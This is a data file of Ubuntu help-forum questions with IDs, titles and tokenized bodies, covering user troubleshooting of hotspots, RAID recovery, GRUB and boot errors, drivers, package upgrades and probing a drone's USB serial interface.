510548	create a ap-hotspot from a wireless connection	i need to create an ap-hotspot from a wireless connection . i use an external wifi adapter connected to my usb port on my laptop as a source for network connection . what i need to do is to extend that signal to my peripherals ( =android phone . not rooted ) using my inbuilt wireless network card on my laptop for broadcasting . i 've installed hostapd and used the ap-hotspot script . although it did create the hotspot and my phone was able to connect to it , it would n't let me use my external wireless card as a source for internet connection at the same time as using my inbuilt card for broadcasting or repeating the signal , which is what i need to do . any suggestions , help or links related to this issue would be appreciated .
510549	what is the google calendar webapp good for ?	after updating to 14.04.1 my firefox suggested that i install a google calendar app . i did so . as far as i can tell it is exactly the same thing as if i 'd run it in chrome . it does n't seem to do anything different or interesting . so , what am i missing about this ? what is it good for ? what makes it better than the pinned tab i 've been using in firefox ?
510550	drive failure in raid1 . ca n't replace	i have a software raid1 and mdadm emailed me that a drive failed . following steps i found online , i marked as failed and removed the drive from the raid . i replaced the drive with an exact make and model but with the new drive in , the raid wo n't start . cat /proc/mdstat just says its inactive . i also can not add the new drive to the raid , keeps saying no superblock on the new drive even though i copied the partition from the working drive to the new one . i removed the new drive and put back in the failed one . the raid does boot up and oddly its trying to rebuild right now but checking my mdadm.conf , it just looks goofy . mdadm.conf # mdadm.conf # # please refer to mdadm.conf ( 5 ) for information about this file . # # by default ( built-in ) , scan all partitions ( /proc/partitions ) and all # containers for md superblocks . alternatively , specify devices to scan , using # wildcards if desired . # device partitions containers # auto-create devices with debian standard permissions create owner=root group=disk mode=0660 auto=yes # automatically tag new arrays as belonging to the local system homehost # instruct the monitoring daemon where to send mail alerts mailaddr myemail @ gmail.com # definitions of existing md arrays # this file was auto-generated on sun , 30 dec 2012 02:27:19 -0700 # by mkconf $ id $ device /dev/sdb1 /dev/sdb1 array /dev/md0 level=raid1 devices=/dev/sdb1 , /dev/sdb1 fdisk -l disk /dev/sda : 640.1 gb , 640135028736 bytes 255 heads , 63 sectors/track , 77825 cylinders , total 1250263728 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00058100 device boot start end blocks id system /dev/sda1 * 2048 1241874431 620936192 83 linux /dev/sda2 1241876478 1250263039 4193281 5 extended /dev/sda5 1241876480 1250263039 4193280 82 linux swap / solaris warning : gpt ( guid partition table ) detected on '/dev/sdb ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sdb : 2000.4 gb , 2000398934016 bytes 255 heads , 63 sectors/track , 243201 cylinders , total 3907029168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sdb1 1 3907029167 1953514583+ ee gpt partition 1 does not start on physical sector boundary . warning : gpt ( guid partition table ) detected on '/dev/sdc ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sdc : 2000.4 gb , 2000398934016 bytes 255 heads , 63 sectors/track , 243201 cylinders , total 3907029168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sdc1 1 3907029167 1953514583+ ee gpt partition 1 does not start on physical sector boundary . disk /dev/md0 : 2000.3 gb , 2000263380992 bytes 2 heads , 4 sectors/track , 488345552 cylinders , total 3906764416 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x00000000 disk /dev/md0 does n't contain a valid partition table i do n't even know what to put here that could help , but i 'd really appreciate any help or advice to get this raid back in working order . update : adding more information after another attempt . after putting back the faulty drive , it started to rebuild then failed as expected . started by making new mdadm.conf file sudo su -c `` /usr/share/mdadm/mkconf > /etc/mdadm/mdadm.conf '' failed then removed /dev/sdc1 installed new hd copied over partition using sgdisk -r /dev/sdc /dev/sdb updated uuid sgdisk -g /dev/sdc sfdisk -r /dev/sdc mdadm -- manage /dev/md0 -- add /dev/sdc1 trying to add sdc1 error mdadm : can not get array info for /dev/md0
510554	removing a primary swap partition and hibernation ( working in opensuse but not ubuntu 14.04 )	i have installed ubuntu 14.04 on my thinkpad x230 . i have 16gb of ram therefore created a 17gb of swap partition during the installation . for some reason , my swap partition was not created properly , so i had to do mkswap and enable it afterwards . i tried to hibernate the system with sudo pm-hibernate but it does n't work properly . now i need to have hibernation since the battery of the lap top is no longer working properly . the hibernation was working in opensuse but it does n't work now on ubuntu . what supposed to be the problem ? if i want to keep my ubuntu , then will i be able to not completely remove the installation , but instead add the 17gb of swap partition to my /home which is encrypted ? if so , how ? thanks ! addendum # 1 # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > # / was on /dev/sda3 during installation uuid=38269bfb-7d5c-4b55-9787-bac42fdfaeda / ext4 errors=remount-ro 0 1 # /boot was on /dev/sda1 during installation uuid=f2750657-f6a7-4283-b5ba-fab15d1448fc /boot ext4 defaults 0 2 # /home was on /dev/sda5 during installation uuid=36eded68-1bd6-4b49-89ca-fd34e21f19db /home ext4 defaults 0 2 # swap was on /dev/sda2 during installation uuid=fae756db-a7bc-400f-8b9a-36327902ca90 none swap sw 0 0 # /dev/mapper/cryptswap1 none swap sw 0 0 and /dev/sda1 : uuid= '' f2750657-f6a7-4283-b5ba-fab15d1448fc '' type= '' ext4 '' /dev/sda2 : uuid= '' fae756db-a7bc-400f-8b9a-36327902ca90 '' type= '' swap '' /dev/sda3 : uuid= '' 38269bfb-7d5c-4b55-9787-bac42fdfaeda '' type= '' ext4 '' /dev/sda5 : uuid= '' 36eded68-1bd6-4b49-89ca-fd34e21f19db '' type= '' ext4 '' and ~ swapon -s filename type size used priority /dev/sda2 partition 16601084 0 -1
510556	upgrading to ubuntu 14.04 from 12.04 on dell inspiron 1440 laptop	is it possible to upgrade ubuntu 12.04 to 14.04 on dell inspiron 1440 model pp42l ?
510557	upgrade from 12.04 lts to 14.04.1 lts failed	after upgrading to 14.0.4.1 from 12.04 , i restarted my pc . but while booting up , its saying /sbin/init missing . i am not able to fall back to 12.04 either . do i need to reinstall the os again . if so , how to do it ?
510558	recovering data after unity crash after installing radeon driver	i installed a graphics driver ( for radeon in dell ) from ubuntu software center . when the system restarted the sidebar is not appearing after login . before login at least few icons appear at top right . after log in nothing appears & i can not even open terminal using `` ctrl + alt + t '' . even the guest session does not work ! when i tried `` ctrl + alt + del '' during boot to start in recovery mode , it still boots & this time the touchpad or mouse is not working . i should have not gambled since i recently migrated completely to ubuntu overwriting windows . is there a way to solve this problem or at least can i recover the data from the system ; allowing me to reinstall the os ?
510560	how to get back the `` find applications online '' option ?	i need to open/ run a file which does n't open with recommended application , so when i right click on it and after that click on 'open with other applications ' then below the recommended and other applications options it must also show a third option ( 'find applications online ' option ) which searches the internet for appropriate application to open the file and offers to install the application ( example wine ) . this third option has been missing from my os for past few days , because i remember it was there initially . how to reactivate or reinstall it ? please help . screenshot :
510561	how to log in locally via unity after joining computer to a domain	i just joined my computer to a windows domain . there is an option to assume the default domain so the user does n't have to enter domain\username -- instead they just have to enter username and it assumes the domain it was joined to . how can i log in locally then , via unity ? i 've tried so many variations and looked on powerbroker 's documentation but have not found any information on this . i 've tried : localhost\username localhost\\username localhost\\\username computername\username computername\\username computername\\\username username @ computername ... nothing works . is it even possible to log in locally if assumedefaultdomain is set to true in /opt/pbis/bin/config ?
510562	ca n't connect to apache2 server from external device ( in lan ) nor from external ip ?	i forwarded ports 80 and 443 for my apache 2 server . however , if i : try connecting to the server via external ip or try connecting to the server from a local device via my local ip , i can not gain access into the server . could this be a firewall issue ? i thought ubuntu had no port restrictions by default ?
510563	grub rescue . how to fix it ?	it all started when i could n't load the grub menu to pick whether i wanted to go to windows or ubuntu . i have been trying to fix it and found out about boot repair . the boot repair application told me a bunch of things to type into the terminal which deleted grub . it then said how to reinstall the grub . for some reason terminal did n't let me install it . meanwhile i could n't look at the partition for windows and the computer said windows would n't mount in the file manager . but when i checked it after i deleted grub it showed all the contents of the partition . anyway , i restarted the computer after i found out about windows to see if it fixed it but instead it brought me to a black screen that said : error : file '/boot/grub/i306-pc/normal.mod ' not found . entering rescue mode ... grub rescue > _ then we 're the underscore is next to `` grub recue > '' i can type commands . i am just wondering what to type to fix this . please help . just some notes : i have ubuntu and windows 8.1 i have done two updates of windows i ca n't access anything except for uefi bios and this boot rescue menu that i have explained
510570	is a windows installation slower	is it correct that if ubuntu is installed inside windows using windows installer then it works slower ?
510572	how do i set up a small terminal server , with both the server and terminals running ubuntu ?	i would like to set up a terminal server and connect 4 or 5 `` terminals '' running ubuntu desktop for a small school . in functional terms , i 'd like the students to be able to log on to their accounts from any machine , using a username and password . i 'm a real newbie at networking , but i 've been using ubuntu for several years and i have a programming background . where should i begin ? thanks in advance !
510575	my odt document saved as a heavy archived xml	i have a file i created with libreoffice . it is 3-pages long and was around 100kb . today when i check it , it 's 2.7mb large . when i click on it ( equivalent to opening ) , libreoffice fails to open it and shows an error . i have to force quit it . it shows no filename extension , but that 's me . it still shows the .odt default icon . it shows opendocument text in properties , meaning it 's a fine odt file . so i thought maybe it 's become something else . i right-clicked and opened with archive manager . well , seems like it was an archive . it had these files : folder `` thumbnals '' ( 9.9kb ) folder `` meta-inf '' ( 3.4kb ) folder `` fonts '' ( 4.6mb ) folder `` configurations2 '' styles.xml ( 13.4kb ) settings.xml ( 9.9kb ) mimetype ( 39bytes ) meta.xml ( 1.2kb ) manifest.rdf ( 899bytes ) layout-cache ( 27bytes ) content.xml ( 38.4kb ) seems like it 's a full fledged xlm document now . i opened the content.xml with firefox , and yes , all my written content was there . i do n't get it . if it 's an opendocument text file , then how is it archived as xml ? ( libreoffice 's support is largely ineffective . superuser does n't have much linux or ubuntu-specific experts . )
510577	terrible lag in dash	i am running ubuntu 14.04 , just installed the latest updates , and now for some reason the dash is unbearably slow . i have disabled blur and it is normal again , but it worked fine before this last update . running intel g33 graphics on intel dual core pentium .
510578	probing a usb device , likely a can bus	i have a usb device that is likely a can bus and i 'm trying to interact with it . i 'm wondering if anyone can offer any advice for probing and discovering what services are available . i suppose a good place to start would be to check whether or not its actually a can bus . i 'm not certain how to do that , though . specifically , i 'm plugged into the usb interface for a dji phantom quad copter . it 's a small autonomous drone . here 's what i have so far : if i call lsusb with the drone plugged in and powered-up , bus 003 device 003 : id fff0:0008 is new . lsusb -vvv gives the further details : bus 003 device 003 : id fff0:0008 device descriptor : blength 18 bdescriptortype 1 bcdusb 2.00 bdeviceclass 2 communications bdevicesubclass 0 bdeviceprotocol 0 bmaxpacketsize0 64 idvendor 0xfff0 idproduct 0x0008 bcddevice 1.00 imanufacturer 1 dji confif iproduct 2 dji controller iserial 3 0001a0000000 bnumconfigurations 1 configuration descriptor : blength 9 bdescriptortype 2 wtotallength 75 bnuminterfaces 2 bconfigurationvalue 1 iconfiguration 0 bmattributes 0x80 ( bus powered ) maxpower 100ma interface association : blength 8 bdescriptortype 11 bfirstinterface 0 binterfacecount 2 bfunctionclass 2 communications bfunctionsubclass 2 abstract ( modem ) bfunctionprotocol 0 none ifunction 4 vcom interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 0 balternatesetting 0 bnumendpoints 1 binterfaceclass 2 communications binterfacesubclass 2 abstract ( modem ) binterfaceprotocol 0 none iinterface 4 vcom cdc header : bcdcdc 1.10 cdc call management : bmcapabilities 0x01 call management bdatainterface 1 cdc acm : bmcapabilities 0x02 line coding and serial state cdc union : bmasterinterface 0 bslaveinterface 1 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x81 ep 1 in bmattributes 3 transfer type interrupt synch type none usage type data wmaxpacketsize 0x0010 1x 16 bytes binterval 2 interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 1 balternatesetting 0 bnumendpoints 2 binterfaceclass 10 cdc data binterfacesubclass 0 unused binterfaceprotocol 0 iinterface 4 vcom endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x02 ep 2 out bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0040 1x 64 bytes binterval 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x82 ep 2 in bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0040 1x 64 bytes binterval 0 device status : 0x0000 ( bus powered ) if i call udevadm and remove the quad copter 's usb cable , i get : udev [ 41256.502177 ] remove /devices/pci0000:00/0000:00:14.0/usb3/3-2/3-2:1.0/tty/ttyacm0 ( tty ) udev [ 41256.502247 ] remove /devices/pci0000:00/0000:00:14.0/usb3/3-2/3-2:1.1 ( usb ) udev [ 41256.502286 ] remove /devices/pci0000:00/0000:00:14.0/usb3/3-2/3-2:1.0 ( usb ) udev [ 41256.502346 ] remove /devices/pci0000:00/0000:00:14.0/usb3/3-2 ( usb ) and when i plug it in ... udev [ 41261.068689 ] add /devices/pci0000:00/0000:00:14.0/usb3/3-2 ( usb ) udev [ 41261.070265 ] add /devices/pci0000:00/0000:00:14.0/usb3/3-2/3-2:1.0 ( usb ) udev [ 41261.071507 ] add /devices/pci0000:00/0000:00:14.0/usb3/3-2/3-2:1.1 ( usb ) udev [ 41261.072843 ] add /devices/pci0000:00/0000:00:14.0/usb3/3-2/3-2:1.0/tty/ttyacm0 ( tty ) so i try to treat it like a can bus interface . it seems okay with the command : sudo slcand -o -s6 -t hw -s 1000000 /dev/ttyacm0 i.e . no error messages , and sudo ip link set up slcan0 creates the network inteface slcan0 and ifconfig now shows : slcan0 link encap : unspec hwaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 up running noarp mtu:16 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:10 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) from this can anyone tell if this is really a can bus i 'm interacting with ? or am i walking down the wrong path ?
510580	netflix desktop	so i am trying install the netflix desktop and it 's telling me that `` ms true type fonts are not properly installed , would you like to download and install them now '' ... . when i go to install install ttf-mscorefonts-installer.. it then says `` it appears that you still have not instllaled the ms true type fonts , you need to accept the license agreement and install these fonts for netflix desktop to work properly . '' i have restarted and same problem ... when i go reinstall tff-mscorefonts-installer i get the message `` data files for some packages could not be downloaded '' what do i do ?
510582	is it possible to edit textboxes in a browser using vim or a vim-style-editor ?	is it possible to edit textboxes in a browser using vim or a vim-style-editor ? ( on ubuntu of course )
510583	how can i do to make ubuntu 14.04 to startup where i left in last session ?	i just have n't been able to configurate ubuntu 14.04 so that it starts up in the last session , just like before i shut it down
510587	configuring grub-pc update error	software updater has been getting stuck at the same point , `` configuring grub-pc '' , for almost a month now . the software updater itself hangs . searching the forum i did n't find any recent posts for this issue . message in the details window are setting up grup-common ( 2.02-beta2-9ubuntul ) ... setting up grup2-common ( 2.02-beta2-9ubuntul ) ... setting up grup-pc-bin ( 2.02-beta2-9ubuntul ) ... setting up grup-pc ( 2.02-beta2-9ubuntul ) ... use of uninitialized value $ _ [ 1 ] in join or string at /usr/share/perl5/debconf/dbdriver/stack.pm is this a know issue and is there a fix or workaround . thank you .
510588	files not correctly copying	when trying to copy files from ubuntu to a partition on the hard drive or external hard drives the copy dialog finishes almost instantly . when the files are looked at via windows the files are empty . the files still appear to be opening correctly in ubuntu . there were other questions asking about this but the responses did n't solve my issue .
510589	ubuntu 12.04 dual boot issues	i am having issues with dual booting of ubuntu 12.04 and windows 8 . my lenovo u400 came with windows 7 pre-installed . last spring , i cloned the hdd on an ssd , upgraded to 8.1 and kept the other drive in the optical drive slot . today , i decided to install ubuntu 12.04 on a partition of the old drive , so i created two partitions ( main and swap ) and installed it from a bootable usb drive . there were no problem from the installation and , i believe , it installed correctly on the partitions . so here are the issues i have had thus far : right after installation , ubuntu would be ignored and windows 8.1 would start automatically . next , i tried to use easybcd but that did n't really do anything . so i looked around and found that it was a uefi issue and found that ubuntu was installed in legacy mode . i changed that following https : //help.ubuntu.com/community/uefi . i had to create a efi partition since there was n't one . then , grub would start but it would purple screen when i chose either os i tried using the bootable usb and run boot-repair but that started giving me grub rescue issues ( `` no such device '' or another error ) . i tried this multiple times and i have been going around in a loop between grub rescue and purple screens after grub . in desperation , i tried reinstalling ubuntu and formatting its partitions but , as expected , this did n't do much . i also tried reinstalling grub2 using the code given on the grub2 webpage and : sudo mount /dev/sdxy /mnt # example : sudo mount /dev/sda5 /mnt sudo grub-install -- boot-directory=/mnt/boot /dev/sdx # example : sudo grub-install -- boot-directory=/mnt/boot /dev/sda but that did n't work either . anyway , i 'm all out of ideas now ... i 'm not sure what to try next . here is the log for boot-repair http : //paste.ubuntu.com/8032307/ in case you need to take a look at it . i did the dual boot installation on my pc and had no problem ... i thought it would be the same but i was wrong . thanks a lot for any help that you can give me , i 'm really lost right now . krsto
510592	annoying ibus hover menu appears after upgrading to 14.04	like so : http : //i.imgur.com/b37mb55.png this menu shows up hovering somewhere conspicuous and annoying every time i switch windows or tabs . it goes away eventually , but it always comes back . i ca n't figure out how to get rid of it . i do n't need it , i already have a key combination set to switch input methods .
510593	error : file '/vmlinuz-3.13.0-32-generic ' not found	i shut my system down yesterday normally and this morning when i boot i get this error `` error : file '/vmlinuz-3.13.0-32-generic ' not found . '' i have tried the all the other advanced options and get the same thing ( with different numbers corresponding to the different options ) i 'm running ubuntu 14.04 on a compaq presario cq50 . any help would be greatly appreciated ! !
510594	problem with zte mf193a usb modem in 12.04lts	recently i 've bought a zte mf 193a data card . it came with the zte driver and application software for windows , linux and mac . i am able to use it in windows but i got trouble in ubuntu ( 12.04lts ) . there is an install.sh script to install the application software . after running the install.sh script , it proceeds installation with following line : ls : ca n't access /usr/share/applications/desktop . *.cache : no such file or directory after processing few more it says that installation is successful , press any key to continue . after pressing a key pc gets stuck and hangs forever after throwing the following lines : testability plugin /opt/qtsdk/desktop/qt/473/gcc/plugins/testability/testability.so load failed with error : the shared library was not found . qobject : :connect : ca n't connect ( null ) : clicked to ... ... . and more ... . then i have to press and hold the power button to shutdown the pc . after booting up the pc gets stuck again within few minutes if the modem is plugged in . the application can run alone without detecting the modem . i have rebooted and tried several times but no luck . please help me . terminal output is similar as follows : ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... .. ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... .. grameenphone_internet/skin/mainminimizeclicked.png grameenphone_internet/skin/mainminimizehover.png grameenphone_internet/skin/mainmsgbutton.png grameenphone_internet/skin/mainmsgbutton_1.png grameenphone_internet/skin/mainmsgbutton_2.png grameenphone_internet/skin/mainmsgbutton_3.png grameenphone_internet/skin/mainmsgbutton_4.png ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... grameenphone_internet/updatecfg.ini grameenphone_internet/updateinfo.xml grameenphone_internet/uudb grameenphone_internet/usr/share/applications/ grameenphone_internet/usr/share/pixmaps/ grameenphone_internet/usr/share/ grameenphone_internet/usr/lib/ grameenphone_internet/plugins/codecs/ grameenphone_internet/plugins/imageformats/ grameenphone_internet/help/english/ grameenphone_internet/config/ grameenphone_internet/usr/ grameenphone_internet/plugins/ grameenphone_internet/help/ grameenphone_internet/bin/ grameenphone_internet/driver/ grameenphone_internet/scripts/ grameenphone_internet/sqldrivers/ grameenphone_internet/wirelessconfig/ grameenphone_internet/pppd/ grameenphone_internet/data/ grameenphone_internet/image/ grameenphone_internet/qss/ grameenphone_internet/skin/ grameenphone_internet/sound/ grameenphone_internet/userdata/ grameenphone_internet/language/ grameenphone_internet/uifile/ grameenphone_internet/ ls : can not access /usr/share/applications/desktop . *.cache : no such file or directory ******begin to /opt/grameenphone_internet/driver this is linux driver installtion make -c /lib/modules/3.2.0-56-generic-pae/build m=/tmp/zte_driver_install_v3.26 modules make [ 1 ] : entering directory `/usr/src/linux-headers-3.2.0-56-generic-pae' cc [ m ] /tmp/zte_driver_install_v3.26/zte.o building modules , stage 2 . modpost 1 modules cc /tmp/zte_driver_install_v3.26/zte.mod.o ld [ m ] /tmp/zte_driver_install_v3.26/zte.ko make [ 1 ] : leaving directory `/usr/src/linux-headers-3.2.0-56-generic-pae' this is customized kernel , kernel version is : 3.2.0-56-generic-pae enter customize_driver_install function disselfirefox.pp driver_install.run driver_uninstall.sh nm.pp se end to /opt/grameenphone_internet/driver udevadm is exist ! install completed ! ! ! ... .after setup , you will find the grameenphone internet in `` applications- > internet- > grameenphone internet '' . click the grameenphone internet and the application will run press any key to continue ... . testability plugin /opt/qtsdk/desktop/qt/473/gcc/plugins/testability/libtestability.so load failed with error : the shared library was not found . qobject : :connect : can not connect ( null ) : :clicked ( ) to uuformconnect_laos_star : :slottoconnectlogform ( ) qobject : :connect : can not connect ( null ) : :clicked ( ) to uuformconnect_laos_star : :slotchangeapn ( ) qobject : :connect : can not connect ( null ) : :clicked ( ) to uuformmain_laos_star : :slotmainmenu ( ) qobject : :connect : can not connect ( null ) : :clicked ( ) to uuformmain_laos_star : :slotsettingbuttonclicked ( ) qobject : :connect : can not connect ( null ) : :clicked ( ) to uuformmain_laos_star : :slotstkbuttonclicked ( ) qobject : :connect : can not connect ( null ) : :clicked ( ) to uuformmain_laos_star : :slothelpbuttonclicked ( ) qobject : :connect : can not connect ( null ) : :clicked ( ) to uuformmain_laos_star : :slotvoicebuttonclicked ( ) qobject : :connect : can not connect ( null ) : :clicked ( ) to uuformmain_laos_star : :slotvoicerecordbuttonclicked ( ) qobject : :connect : can not connect ( null ) : :clicked ( ) to uuformmain_laos_star : :slothomebuttonclicked ( ) qobject : :connect : can not connect ( null ) : :clicked ( ) to uuformmain_laos_star : :slotnewrecivesmsclicked ( ) qobject : :connect : can not connect ( null ) : :clicked ( ) to uuformmain_laos_star : :slotmissedcallsignclicked ( ) qobject : :connect : can not connect ( null ) : :clicked ( ) to uuformmain_laos_star : :slotcallingsignclicked ( ) qobject : :connect : can not connect ( null ) : :clicked ( ) to uuformmain_laos_star : :slotmissedcallsignclicked ( ) qobject : :connect : can not connect ( null ) : :clicked ( ) to uuformmain_laos_star : :slotshowv4v6info ( ) qobject : :connect : can not connect ( null ) : :clicked ( ) to uuformmain_laos_star : :slotclickmainbuttonactivesim ( ) qobject : :connect : can not connect ( null ) : :clicked ( ) to uuformmain_laos_star : :slotclickmainbuttonrefill ( ) qobject : :connect : can not connect ( null ) : :clicked ( ) to uuforminputpin : :slotinputpincancel ( ) qobject : :connect : can not connect ( null ) : :clicked ( ) to uuforminputpuk : :slotinputpukcancel ( ) qobject : :connect : can not connect ( null ) : :clicked ( ) to uuformsmsbox_laos_star : :slotreadbuttonclicked ( ) qobject : :connect : can not connect ( null ) : :clicked ( ) to uuformsmsbox_laos_star : :slotsavebuttonclicked ( ) qobject : :connect : can not connect ( null ) : :clicked ( ) to uuformsmsbox_laos_star : :slottosmsmainform ( ) qobject : :connect : can not connect ( null ) : :clicked ( ) to uuformsmsbox_laos_star : :slottocall ( ) qobject : :connect : can not connect ( null ) : :clicked ( ) to uuformsmschat : :slottonewsmsform ( ) qobject : :connect : can not connect ( null ) : :clicked ( bool ) to uuformsmschat : :slotselectallaction ( bool ) qobject : :connect : can not connect ( null ) : :clicked ( ) to uuformsmschat : :slotdeletechatrecord ( ) qobject : :connect : can not connect ( null ) : :clicked ( ) to uuformsmschat : :slotdeletesearchcontentbuttonclicked ( ) qobject : :connect : can not connect ( null ) : :clicked ( ) to uuformsmschat : :slotshowcommontoolmenu ( ) qobject : :connect : can not connect ( null ) : :textchanged ( qstring ) to uuformsmschat : :slotsearchsmspccontent ( ) qobject : :connect : can not connect ( null ) : :textchanged ( qstring ) to uusmsrecordlistdelegate : :slotsetsearchkey ( const qstring & ) qobject : :connect : can not connect ( null ) : :doubleclicked ( qmodelindex ) to uuformsmschat : :slotsearchsmsitemread ( const qmodelindex & ) qobject : :connect : can not connect ( null ) : :clicked ( ) to uuformsmschatsession : :slotdeleteselectedsms ( ) qobject : :connect : can not connect ( null ) : :statechanged ( int ) to uuformsmschatsession : :slotselectallaction ( int ) qstring : :arg : argument missing : `` info : '' , 0 qstring : :arg : argument missing : `` info : '' , 0 qobject : :connect : can not connect ( null ) : :clicked ( ) to uuformsmsread : :slotsavenumber ( ) qobject : :connect : can not connect ( null ) : :clicked ( ) to uuformsmsread : :slotforwardmessage ( ) qobject : :connect : can not connect ( null ) : :clicked ( ) to uuformsmsread : :slotreplymessage ( ) designer : an error has occurred while reading the ui file at line 1 , column 0 : premature end of document . qobject : :connect : can not connect ( null ) : :clicked ( ) to uuformsmscapacity : :slotsmscapacityback ( ) begin bind slotsystermsleeping ( ) , slotsystermresuming ( ) , uupowerstatelistener : :startlisten_linux ( ) end bind slotsystermsleeping ( ) , slotsystermresuming ( ) , uupowerstatelistener : :startlisten_linux ( )
510596	nautilus doesnt have window border on gnome shell	i have a problem with nautilus that nautilus window border is disappearing . as you can see , there 's no window border . what can i do to get it back ? using : nautilus 3.10.1 and gnome shell 3.10.4
510600	how does ! effect sort in vim	i am trying to sort the contents in my text file using the command :1 , $ sort this results in lines arranged in order based on the starting character - symbols , capital letters and then small letters now if i use :1 , $ ! sort i get a different order which does not seem to make any sense . everything looks mixed up . so what is the role of the ! command here ? why does it mess up the entire sorting behaviour ? according to http : //stackoverflow.com/a/1220118/2105986 , it is supposed to be a filter operator .
510601	upgrade fails . how should i interpret the apt.log ?	when i run $ sudo do-release-upgrade i get an error `` could not calculate the upgrade '' i see from this link that i am supposed to run this command could not calculate the upgrade , what happened ? but how should i interpret the apt.log ? how do i fix this ? $ grep broken /var/log/dist-upgrade/apt.log broken xz-utils : amd64 conflicts on xz-lzma [ amd64 ] < 5.1.1alpha+20110809-3 > ( utils ) broken libhdf5-7 : amd64 conflicts on libhdf5-1.8 [ amd64 ] < none > ( none ) broken libhdf5-7 : amd64 conflicts on libhdf5-1.8.4 [ amd64 ] < none > ( none ) broken libhdf5-7 : amd64 conflicts on libhdf5-serial-1.8.4 [ amd64 ] < 1.8.4-patch1-3ubuntu2 > ( libs ) broken libnetcdfc7 : amd64 breaks on libnetcdf6 [ amd64 ] < 1:4.1.1-6 > ( libs ) ( < 1:4.1.1-7~ ) broken libsnmp-base : amd64 breaks on libsnmp15 [ amd64 ] < 5.4.3~dfsg-2.4ubuntu1.2 > ( libs ) ( < 5.7.2~dfsg-5 ) broken libgdal1 : amd64 depends on libhdf5-serial-1.8.4 [ amd64 ] < 1.8.4-patch1-3ubuntu2 > ( libs ) broken libgdal1 : amd64 depends on libhdf5-1.8.4 [ amd64 ] < none > ( none ) broken libgdal1 : amd64 depends on libnetcdf6 [ amd64 ] < 1:4.1.1-6 > ( libs ) broken postgis : amd64 depends on libgdal1 [ amd64 ] < 1.9.0-3.1~pgdg12.4+1 > ( libs ) ( > = 1.9.0 ) broken postgresql-9.3-postgis-2.1 : amd64 depends on libgdal1 [ amd64 ] < 1.9.0-3.1~pgdg12.4+1 > ( libs ) ( > = 1.9.0 ) broken libxerces-c-dev : amd64 conflicts on libxerces-c2-dev [ amd64 ] < 2.8.0+deb1-2build3 - > 2.8.0+deb1-3build1 > ( universe/libdevel ) broken libperl5.14 : amd64 depends on perl-base [ amd64 ] < 5.14.2-6ubuntu2.4 - > 5.18.2-2ubuntu1 > ( perl ) ( = 5.14.2-6ubuntu2.4 ) broken libgdal1-1.7.0 : amd64 depends on libhdf5-serial-1.8.4 [ amd64 ] < 1.8.4-patch1-3ubuntu2 > ( libs ) broken libgdal1-1.7.0 : amd64 depends on libhdf5-1.8.4 [ amd64 ] < none > ( none ) broken libgdal1-1.7.0 : amd64 depends on libnetcdf6 [ amd64 ] < 1:4.1.1-6 > ( libs )
510605	i am not getting any user interface to work with on dupeguru , fslint	i am not getting any interfaces to work with on dupeguru , fslint , or other programs or text commands . i am not a programmer and new to ubuntu still i am enjoying it but having difficult time doing some things like getting rid of duplicate files . i know i had a bad time installing ubuntu with windows 8.1 so i figured out that these errors might be causing some of my problems .
510606	error adding symbols : dso missing from command line	i am newbie to ubuntu.i want to compile a project that uses opencv but it gives following error : cmake . & & make /usr/bin/ld : cmakefiles/ground_estimation.dir/projectdir/src/stereo_matching/opencvstereo.cpp.o : undefined reference to symbol '_zn2cv3gpu6gpumatc1erkns_3mate' /usr/local/lib/libopencv_core.so.2.4 : error adding symbols : dso missing from command collect2 : error : ld returned 1 exit status make [ 2 ] : *** [ ground_estimation ] error 1 make [ 1 ] : *** [ cmakefiles/ground_estimation.dir/all ] error 2 make : *** [ all ] error 2 i also used this command cmake . & & make -lopencv_core but did not solve . ( ubuntu 14.04 64bit , opencv 2.4.9 )
510608	gtx 780 and video card drivers failing	i installed the current version of nvidia drivers through sudo apt-get and i use current as the parameter for version and after i install ( no errors installs properly ) . when i try to restart to get the drivers to kick in . my ubuntu no longer functions i log in and it never loads the desktop just sets on a blank background forever . i have tried installing the drivers twice on fresh ubuntu installs this has happened both times . when i do sudo service lightdm stop my monitor goes blank so i skip that step . is that my problem ?
510613	installation ubuntu	trying to install ubuntu on my older acer notebook using a dvd disc after trying zorin for a bit . for some reason i always receive a failed install when nearly to the end of the install . yet i can `` try ubuntu '' without a problem . i 've also tried this install using a usb with the same result . when the laptop is rebooted , all i get is a black screen with a blinking prompt in the upper left .
510615	event viewer and device manager for ubuntu ?	are there any event viewer and device manager equivalent applications for ubuntu ( like windows ) so that i can track every task occurring in it ?
